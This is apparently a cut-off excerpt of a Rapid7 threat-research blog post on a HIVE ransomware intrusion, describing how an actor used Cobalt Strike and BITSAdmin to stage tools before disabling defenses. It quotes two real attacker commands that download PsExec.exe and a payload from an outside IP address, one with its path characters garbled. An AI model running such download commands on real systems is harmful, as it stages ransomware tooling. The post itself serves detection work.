Increasing The Sting of HIVE Ransomware

How malicious actors evade detection and disable defenses for more destructive HIVE Ransomware attacks.

Rapid7 routinely conducts research into the wide range of techniques that threat actors use to conduct malicious activity. One objective of this research is to discover new techniques being used in the wild, so we can develop new detection and response capabilities.

Recently, Rapid7 observed a malicious actor performing several known techniques for distributing ransomware across many systems within a victim’s environment. In addition to those techniques, the actor employed a number of previously unseen techniques designed to to drop the defenses of the victim, inhibit monitoring, disable networking and allow time for the ransomware to finish encrypting files. These extra steps would make it extremely difficult, if not impossible, for a victim to effectively use their security tools to defend endpoints after a certain point in the attack.

Rapid7 has updated existing and added new detections to InsightIDR to defend against these techniques. In this article, we’ll explore the techniques employed by the threat actor, why they’re so effective, and how we’ve updated InsightIDR to protect against them.

What approach did the malicious actor take to prepare the victim's environment?

Initially using Cobalt Strike, the malicious actor retrieved system administration tools and malicious payloads by using the Background Intelligent Transfer Service (BITSAdmin).

"C:Windowssystem32itsadmin.exe" /transfer debjob /download /priority normal http://79.137.206.47/PsExec.exe C:UsersPublicPsExec.exe

bitsadmin /transfer debjob /download /priority normal http://79.137.206.47/int.exe C:Windowsint.exe

The malicious actor then began using the remote process execution tool ..

Support the originator by clicking the read the rest link below.